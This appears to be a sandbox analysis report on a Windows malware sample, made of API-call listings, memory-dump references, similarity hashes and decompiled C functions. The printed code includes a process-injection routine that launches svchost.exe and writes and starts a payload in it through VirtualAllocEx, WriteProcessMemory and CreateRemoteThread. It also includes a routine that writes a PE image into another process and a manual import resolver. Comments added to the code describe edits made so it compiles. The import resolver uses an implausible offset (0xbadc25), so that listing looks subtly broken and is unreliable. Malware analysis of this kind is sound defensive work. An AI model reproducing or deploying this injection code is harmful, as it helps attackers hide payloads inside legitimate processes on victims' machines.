• Opcode ID: 147e0b6cb8d2085475916373d5b969a1ca4e552eb17018fa446d8f1dc223b373
• Instruction ID: c1e39abc33c238841df128e49a5edd2cbcffa8180e92ec94bf8f7c46d0a9fd00
• Opcode Fuzzy Hash: 147e0b6cb8d2085475916373d5b969a1ca4e552eb17018fa446d8f1dc223b373
• Instruction Fuzzy Hash: 4DF0B43260122066FB615AA1DC05AAB7B6BAF41762F145311EC4496291CA30F80986E0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00650D4B
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 56856869e71323a31d5d023d5c4ec6784aa212a10a96036a209f4be00108629d
• Instruction ID: 17d97e1f88bb3d579470337860a4c73100c8d7b13b874ed606b0b0be8e965ca3
• Opcode Fuzzy Hash: 56856869e71323a31d5d023d5c4ec6784aa212a10a96036a209f4be00108629d
• Instruction Fuzzy Hash: 45E0E535500221AAF7702BE5AC05BAB3AAFDF013A2F640310EC88962A1CA60EC4442E5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Sandbox decompilation of the sample's heap-free wrapper (decompiler output, not
			   original source). The global at 0x61715c holds the heap handle that the subcall
			   function 00611390 obtained via GetProcessHeap; RtlFreeHeap is the ntdll export
			   behind HeapFree, declared here so the listing compiles. */
			#include <windows.h>
			BOOLEAN NTAPI RtlFreeHeap(PVOID HeapHandle, ULONG Flags, PVOID BaseAddress);
			#define HEAP_HANDLE_SLOT ((void**)0x61715c)   /* global heap handle in the sample's data */

			char E006113D0(void* _a4) {
				void* _t2 = 0;   /* left uninitialised by the decompiler; zeroed here (nothing freed) */
				char _t4;
				void* _t5;

				if( *HEAP_HANDLE_SLOT != 0) {
					_t5 =  *HEAP_HANDLE_SLOT; // 0x1380000 at analysis time
					_t4 = (char)RtlFreeHeap(_t5, 0, _a4); // executed: release the block _a4
					return _t4;
				}
				return (char)(INT_PTR)_t2;
			}

APIs
• RtlFreeHeap.NTDLL(01380000,00000000,00611CED,?,00611CED,?,?,?,?,00612625,?,00611A9B), ref: 006113E9
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 698ce7d0f0ea9ecb0e32b62967a13325724e85a6babb7a1519bf47dcdcaad9cd
• Instruction ID: 6988ced2c4c9f4f10874c9ff5e1294614650e29725f817a32cb2186a559ac834
• Opcode Fuzzy Hash: 698ce7d0f0ea9ecb0e32b62967a13325724e85a6babb7a1519bf47dcdcaad9cd
• Instruction Fuzzy Hash: EFC01231104204ABD3089F86FC49BE5336F9306301F0C9105B7084B6A0C6759980CB50
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 87%
			/* Sandbox decompilation of the sample's payload-launch routine (decompiler output, not
			   original source). This is the code behind the "Contains functionality to inject
			   threads in other processes" signature: _a4 = payload bytes, _a8 = payload size,
			   _a12 = non-zero to place the payload in another process, _a16 = non-zero to run the
			   local copy on a new thread instead of calling it inline. E00611450, E006139C0 and
			   E00612C20 are other functions of the sample; their roles (copy routine, thread start
			   routine, target-process lookup) are inferred from how they are used here. */
			#include <windows.h>
			typedef INT_PTR intOrPtr;                 /* decompiler's generic "int or pointer" type */
			void  E00611450(void* dst, void* src, long len);       /* copies len bytes dst <- src */
			DWORD WINAPI E006139C0(LPVOID param);                  /* thread entry, param = payload */
			int   E00612C20(void** phProcess, char* outBuf);       /* opens target process */

			int E00613860(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void (*_v28)(void);   /* decompiler had void*; typed as function pointer so the call compiles */
				char _v32;
				long _v36;

				if(_a12 == 0) {
					/* Local path: 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE,
					   i.e. a fresh RWX region, the allocation pattern memory scanners key on. */
					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
					if(_v8 == 0) {
						L14:
						return 0;
					}
					E00611450(_v8, _a4, _a8);
					if(_a16 == 0) {
						_v28 = (void (*)(void))_v8;   /* run the copied payload inline */
						_v28();
						return 1;
					}
					_v24 = CreateThread(0, 0, E006139C0, _v8, 0, 0);
					if(_v24 == 0) {
						goto L14;
					}
					CloseHandle(_v24);
					return 1;
				}
				/* Remote path: allocate RWX in the target, write the payload, start a remote thread
				   at it (VirtualAllocEx / WriteProcessMemory / CreateRemoteThread, as listed under APIs). */
				if(E00612C20( &_v16,  &_v32) != 0) {
					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
						L7:
						goto L14;
					} else {
						_v20 = CreateRemoteThread(_v16, 0, 0, (LPTHREAD_START_ROUTINE)_v12, 0, 0, (LPDWORD) &_v36);
						if(_v20 == 0) {
							goto L7;
						}
						CloseHandle(_v20);
						return 1;
					}
				}
				return 0;
			}


                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,00611F97), ref: 0061389C
                                                                                                                                                    • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,00611F97), ref: 006138BD
                                                                                                                                                    • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 006138DB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00611F97), ref: 006138EE
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,00611F97), ref: 0061390A
                                                                                                                                                    • CreateThread.KERNEL32 ref: 00613944
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00613957
                                                                                                                                                      • Part of subcall function 00612C20: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00612C51
                                                                                                                                                      • Part of subcall function 00612C20: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00612C63
                                                                                                                                                      • Part of subcall function 00612C20: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00612C89
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                     • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2742758278-0
                                                                                                                                                    • Opcode ID: e1fe2eef37ffb59765205190ff31ed80c251620db0ced5d6d0908cc182484c5c
                                                                                                                                                    • Instruction ID: c03e946215e131b4c26eb5ac98fa621491933b1faaeb71bec55963645a9ffe35
                                                                                                                                                    • Opcode Fuzzy Hash: e1fe2eef37ffb59765205190ff31ed80c251620db0ced5d6d0908cc182484c5c
                                                                                                                                                    • Instruction Fuzzy Hash: 1E312F75A04218FBDB14CFA4DC49BEE777AAB48701F148519F606AB3D0E7B49B80CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0065C88D,00000002,00000000,?,?,?,0065C88D,?,00000000), ref: 0065C608
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,0065C88D,00000002,00000000,?,?,?,0065C88D,?,00000000), ref: 0065C631
                                                                                                                                                    • GetACP.KERNEL32(?,?,0065C88D,?,00000000), ref: 0065C646
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: 4be5178a30e26d22d74885b221760d718e1fbd9167716d5c679615fd01fd6c4f
                                                                                                                                                    • Instruction ID: c43a28e0da538051f006be51020169cb6003df2bc5b8cded01121d012fa7dc39
                                                                                                                                                    • Opcode Fuzzy Hash: 4be5178a30e26d22d74885b221760d718e1fbd9167716d5c679615fd01fd6c4f
                                                                                                                                                    • Instruction Fuzzy Hash: FD21AC72A00301AEEB348F94C940AD777A7AB50B76F565164EE0AD7300FB32EE49C390
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$InformationTimeZone
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 597776487-0
                                                                                                                                                    • Opcode ID: 07a23ac7d2711a4fdeba619da94bd89c81736c0fae679dba72fbf83ecf13791b
                                                                                                                                                    • Instruction ID: 215e07de9d9a2c005103b9898deb2ce965b070483b8b41ec6baefeb127d6bc40
                                                                                                                                                    • Opcode Fuzzy Hash: 07a23ac7d2711a4fdeba619da94bd89c81736c0fae679dba72fbf83ecf13791b
                                                                                                                                                    • Instruction Fuzzy Hash: F5C11571908205AFDB209F78EC45AEA7BEBEF55351F2841AEEC80D7381E6308E49D754
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,0064D044,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0065BE86
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0064D044,?,?,?,00000055,?,-00000050,?,?), ref: 0065BEB1
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0065BF45
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0065BF53
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0065C014
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4147378913-0
                                                                                                                                                    • Opcode ID: a96e40795f3bde9534c0303835310a51da1055dcae44d854188a2bb7cc5dbd00
                                                                                                                                                    • Instruction ID: ff04e3df0b077a6c02c1c3da63cb1c5a01b8bf77d860a8c945cb1337e8228a7d
                                                                                                                                                    • Opcode Fuzzy Hash: a96e40795f3bde9534c0303835310a51da1055dcae44d854188a2bb7cc5dbd00
                                                                                                                                                    • Instruction Fuzzy Hash: 3371E671600702AADB24AF34CC42BFA73AAEF44752F14542DFE05DB281EB75E9498B64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650ADD
                                                                                                                                                      • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650B13
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0065C850
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0065C899
                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0065C8A8
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0065C8F0
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0065C90F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 949163717-0
                                                                                                                                                    • Opcode ID: 7c8e89200a49c7e021660c8a5c7fd066344b5fc5cfd65f6df8a990151af56a6f
                                                                                                                                                    • Instruction ID: d8515e79be9801bbba502fcc56cc8a35538f4602b9311c662252d186e73fa065
                                                                                                                                                    • Opcode Fuzzy Hash: 7c8e89200a49c7e021660c8a5c7fd066344b5fc5cfd65f6df8a990151af56a6f
                                                                                                                                                    • Instruction Fuzzy Hash: B0518371A00705AFEB10DFA5CC45AFE77BABF48712F144129ED15E7291EBB09948CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E00613250(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				void* _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				long _v20;
                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                    				long _v28;
                                                                                                                                                    				void* _t57;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    				void* _t92;
                                                                                                                                                    				void* _t93;
                                                                                                                                                    
                                                                                                                                                    				_t3 = _a8 + 0x3c; // 0xf445c7f8
                                                                                                                                                    				_v24 = _a8 +  *_t3;
                                                                                                                                                    				_v16 =  *((intOrPtr*)(_v24 + 0x34));
                                                                                                                                                    				_v20 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					_v8 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40);
                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                    						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
                                                                                                                                                    						_v16 = _v8;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					_t57 = E00611390(_v20);
                                                                                                                                                    					_t93 = _t92 + 4;
                                                                                                                                                    					_v12 = _t57;
                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                    						_t59 = E006139E0(_a8, _a12, _v12, _v16);
                                                                                                                                                    						_t92 = _t93 + 0x10;
                                                                                                                                                    						if(_t59 == 0) {
                                                                                                                                                    						} else {
                                                                                                                                                    							if(_a16 != 0) {
                                                                                                                                                    								 *_a16 = _v16;
                                                                                                                                                    							}
                                                                                                                                                    							if(_a20 != 0) {
                                                                                                                                                    								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
                                                                                                                                                    							}
                                                                                                                                                    							if(WriteProcessMemory(_a4, _v8, _v12, _v20, 0) != 0) {
                                                                                                                                                    								_v28 = 1;
                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    					}
                                                                                                                                                    					L17:
                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                    						E006113D0(_v12);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v8 != 0 && _v28 == 0) {
                                                                                                                                                    						VirtualFreeEx(_a4, _v8, 0, 0x8000);
                                                                                                                                                    					}
                                                                                                                                                    					return _v28;
                                                                                                                                                    				}
                                                                                                                                                    				goto L17;
                                                                                                                                                    			}

                                                                                                                                                    0x0061325c
                                                                                                                                                    0x0061325f
                                                                                                                                                    0x00613268
                                                                                                                                                    0x00613271
                                                                                                                                                    0x00613274
                                                                                                                                                    0x0061327b
                                                                                                                                                    0x00613282
                                                                                                                                                    0x00613289
                                                                                                                                                    0x006132a2
                                                                                                                                                    0x006132a9
                                                                                                                                                    0x006132c2
                                                                                                                                                    0x006132c8
                                                                                                                                                    0x006132c8
                                                                                                                                                    0x006132cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006132da
                                                                                                                                                    0x006132df
                                                                                                                                                    0x006132e2
                                                                                                                                                    0x006132e9
                                                                                                                                                    0x006132fd
                                                                                                                                                    0x00613302
                                                                                                                                                    0x00613307
                                                                                                                                                    0x00613309
                                                                                                                                                    0x0061330d
                                                                                                                                                    0x00613315
                                                                                                                                                    0x00613315
                                                                                                                                                    0x0061331b
                                                                                                                                                    0x00613329
                                                                                                                                                    0x00613329
                                                                                                                                                    0x00613349
                                                                                                                                                    0x0061334d
                                                                                                                                                    0x00613356
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061334b
                                                                                                                                                    0x00613349
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006132eb
                                                                                                                                                    0x0061335c
                                                                                                                                                    0x00613360
                                                                                                                                                    0x00613366
                                                                                                                                                    0x0061336b
                                                                                                                                                    0x00613372
                                                                                                                                                    0x00613389
                                                                                                                                                    0x00613389
                                                                                                                                                    0x00613395
                                                                                                                                                    0x00613395
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00611EAF,FFFFFFFF,00003000,00000040), ref: 0061329C
                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 006132BC
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 00613341
                                                                                                                                                    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 00613389
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2713107948-0
                                                                                                                                                    • Opcode ID: 35fbc9810c1ef8629927f2afbf2417da3d903e3c9eaf03c3c7bcc4a95b6ac0a4
                                                                                                                                                    • Instruction ID: 5fc7d5d6c24be4d38e73b69cc56678e373c9e9535d8b2e3a89cc5b623ce296b1
                                                                                                                                                    • Opcode Fuzzy Hash: 35fbc9810c1ef8629927f2afbf2417da3d903e3c9eaf03c3c7bcc4a95b6ac0a4
                                                                                                                                                    • Instruction Fuzzy Hash: C04130B4A00219EFDB14CF94C845BEEB7B6BF48304F188159EA16A7380D7709B84CB95
                                                                                                                                                    Uniqueness
                                                                                                                                                    • Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00613560(intOrPtr _a4) {
                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                    				struct HINSTANCE__* _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				signed int* _v20;
                                                                                                                                                    				_Unknown_base(*)()* _v24;
                                                                                                                                                    				CHAR* _v28;
                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                    				intOrPtr* _v40;
                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                    
                                                                                                                                                    				_v32 = _a4;
                                                                                                                                                    				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
                                                                                                                                                    				_v40 = _v36 + 0xbadc25;
                                                                                                                                                    				_v44 =  *_v40;
                                                                                                                                                    				_v8 = _a4 + _v44;
                                                                                                                                                    				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                    					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
                                                                                                                                                    					_v12 = 0;
                                                                                                                                                    					_v12 = GetModuleHandleA(_v28);
                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                    						_v12 = LoadLibraryA(_v28);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                    						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                    						_v20 = _a4 +  *_v8;
                                                                                                                                                    						if( *_v8 == 0) {
                                                                                                                                                    							_v20 = _v16;
                                                                                                                                                    						}
                                                                                                                                                    						while( *_v16 != 0) {
                                                                                                                                                    							_v48 = _a4 +  *_v20;
                                                                                                                                                    							_v24 = 0;
                                                                                                                                                    							if(( *_v20 & 0x80000000) == 0) {
                                                                                                                                                    								_v24 = GetProcAddress(_v12, _v48 + 2);
                                                                                                                                                    							} else {
                                                                                                                                                    								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
                                                                                                                                                    							}
                                                                                                                                                    							if( *_v16 != _v24) {
                                                                                                                                                    								 *_v16 = _v24;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v16 + 4;
                                                                                                                                                    							_v20 =  &(_v20[1]);
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _v8 + 0x14;
                                                                                                                                                    						continue;
                                                                                                                                                    					} else {
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return 1;
                                                                                                                                                    			}

                                                                                                                                                    0x00613569
                                                                                                                                                    0x00613575
                                                                                                                                                    0x00613587
                                                                                                                                                    0x0061358f
                                                                                                                                                    0x00613598
                                                                                                                                                    0x0061359b
                                                                                                                                                    0x006135b1
                                                                                                                                                    0x006135b4
                                                                                                                                                    0x006135c5
                                                                                                                                                    0x006135cc
                                                                                                                                                    0x006135d8
                                                                                                                                                    0x006135d8
                                                                                                                                                    0x006135df
                                                                                                                                                    0x006135f1
                                                                                                                                                    0x006135fc
                                                                                                                                                    0x00613605
                                                                                                                                                    0x0061360a
                                                                                                                                                    0x0061360a
                                                                                                                                                    0x0061360d
                                                                                                                                                    0x0061361d
                                                                                                                                                    0x00613620
                                                                                                                                                    0x00613631
                                                                                                                                                    0x0061365f
                                                                                                                                                    0x00613633
                                                                                                                                                    0x00613649
                                                                                                                                                    0x00613649
                                                                                                                                                    0x0061366a
                                                                                                                                                    0x00613672
                                                                                                                                                    0x00613672
                                                                                                                                                    0x0061367a
                                                                                                                                                    0x00613683
                                                                                                                                                    0x00613683
                                                                                                                                                    0x0061368e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006135e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006135e1
                                                                                                                                                    0x006135df
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 006135BF
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 006135D2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00613643
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00613659
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 384173800-0
                                                                                                                                                    • Opcode ID: acb7aab04d1b70b94222928ad93017452ceff359bd5f802487bbc7fa3e3b501f
                                                                                                                                                    • Instruction ID: e342c9e4526fb684cf0b26326ebb3bb06d2e961c3eeab3272fbd3c23016c5a6c
                                                                                                                                                    • Opcode Fuzzy Hash: acb7aab04d1b70b94222928ad93017452ceff359bd5f802487bbc7fa3e3b501f
                                                                                                                                                    • Instruction Fuzzy Hash: 57419574E00219EFDB04CF98C894AEDBBB2FF48305F248599D916AB354D734AA81CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,0062B5EB,0068BAB0,00000017), ref: 0062B4D1
• UnhandledExceptionFilter.KERNEL32(0068BAB0,?,0062B5EB,0068BAB0,00000017), ref: 0062B4DA
• GetCurrentProcess.KERNEL32(C0000409,?,0062B5EB,0068BAB0,00000017), ref: 0062B4E5
• TerminateProcess.KERNEL32(00000000,?,0062B5EB,0068BAB0,00000017), ref: 0062B4EC
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: 880620e61c25cd2dd7c41ad549c753f7d7b78a0ef679b980c5d0656c23145416
• Instruction ID: 31ec9704323a8658630816dfb9eff7ec8e6df4f343abb3d780a53aa3940789ed
• Opcode Fuzzy Hash: 880620e61c25cd2dd7c41ad549c753f7d7b78a0ef679b980c5d0656c23145416
• Instruction Fuzzy Hash: 9FD0123204020AFFEF002BE0FC0CA483F2AEB08612FC06200F38AA7020CF3144068B61
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
  • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
  • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650ADD
  • Part of subcall function 00650A7B: _free.LIBCMT ref: 00650B13
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C24A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C294
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0065C35A
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: InfoLocale$ErrorLast_free
• String ID:
• API String ID: 3140898709-0
• Opcode ID: 7747aa329ca15833cc0c89e6053598f712610de4895567d34ec8b8989a34508a
• Instruction ID: e855a9a76c877c9481584f81a85cfea54e729988add3235da07af56b2d865028
• Opcode Fuzzy Hash: 7747aa329ca15833cc0c89e6053598f712610de4895567d34ec8b8989a34508a
• Instruction Fuzzy Hash: 0761937191031B9FDB689F28CC92BBA77EAEF04322F508169ED05C6281E734DD89CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00658429
• FindNextFileW.KERNEL32(00000000,?), ref: 006584A7
• FindClose.KERNEL32(00000000), ref: 006584E9
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
